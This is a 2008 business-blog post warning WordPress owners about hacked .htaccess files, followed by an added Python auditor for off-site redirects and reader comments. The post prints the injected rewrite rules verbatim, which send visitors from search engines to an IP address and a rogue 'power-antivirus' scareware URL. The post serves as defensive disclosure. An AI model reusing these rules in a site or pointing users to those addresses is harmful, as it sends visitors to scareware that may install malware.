Brian Turner's Business Blog
 
Business, Marketing, Search, Internet, Blogs, Forums, and Tech
August 27, 2008

Watch out for Wordpress .htaccess hack

Just a quick heads-up for anybody who may have any older Wordpress installs running: check that your .htaccess file hasn’t been hacked.

I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere.

In short, the original .htaccess file is replaced with one which redirects internal page requests to a Russian “check your PC security” site, which may also threaten to install malware.

It’s a nasty little hack, and this is what I found on mine:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

The result was to send people to the following link:
http://scan.power-antivirus-2009.com/?aff=1050

Ugly, nasty, and very annoying.

Go check now if you need to.
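One way to run that check across many installs, as an added example that is not part of the original post: the function below flags any RewriteRule or ErrorDocument in an .htaccess file that points at an off-site http(s) URL, and marks rules gated on the referrer, which is how the rules above fire only for visitors arriving from search engines. The names `audit_htaccess` and `external_host` are hypothetical, and the parser assumes simple whitespace-separated directives.

```python
import re
from urllib.parse import urlsplit

def external_host(target, own_hosts):
    """Host of an absolute http(s) URL that is not one of ours, else None."""
    if not re.match(r"https?://", target, re.I):
        return None
    host = (urlsplit(target).hostname or "").lower()
    return None if host in own_hosts else host

def audit_htaccess(text, own_hosts=()):
    """Return (line_no, kind, host) for each off-site redirect in .htaccess text."""
    own = {h.lower() for h in own_hosts}
    findings, referer_gated = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()  # Apache directive names are case-insensitive
        target = parts[2] if len(parts) > 2 else ""
        if directive == "rewritecond" and len(parts) > 1:
            referer_gated |= "http_referer" in parts[1].lower()  # gate on referrer
        elif directive == "rewriterule":
            host = external_host(target, own)
            if host:
                kind = "referer-gated redirect" if referer_gated else "external redirect"
                findings.append((no, kind, host))
            referer_gated = False  # conditions bind only to the next RewriteRule
        elif directive == "errordocument":
            host = external_host(target, own)
            if host:
                findings.append((no, "external ErrorDocument", host))
    return findings

# Sample input: the rules quoted in the post above.
HACKED = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
"""

if __name__ == "__main__":
    for no, kind, host in audit_htaccess(HACKED):
        print(f"line {no}: {kind} -> {host}")
```

Pass your own domain names in `own_hosts` so that legitimate redirects to your own site are not reported.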






4 Comments »
  1. Good info, but is this just for older versions, and how old a version are you referring to?

    Comment by Liz — August 28, 2008 @ 11:45 pm

  2. Thanks, I had one older (I mean, really old) WP version running and the .htaccess file wasn’t the only thing that was wrong with it!

    Comment by Lening — September 10, 2008 @ 9:43 am

  3. Thanks for the tip, I’m going to check now and also plan an upgrade of my Wordpress installs.

    Comment by Computing Tips — October 6, 2008 @ 1:44 am

  4. Thanks for the heads-up. I think I visited a site which must have been hacked like this a couple of weeks ago. Very annoying indeed. Will check my Wordpress sites now.

    Comment by Tom — November 18, 2008 @ 4:18 pm
